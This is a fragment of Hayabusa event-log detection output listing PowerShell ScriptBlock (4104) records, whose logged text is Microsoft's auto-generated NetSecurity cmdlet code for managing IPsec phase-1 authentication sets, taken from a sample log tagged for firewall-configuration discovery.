ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', Pos",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"itionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 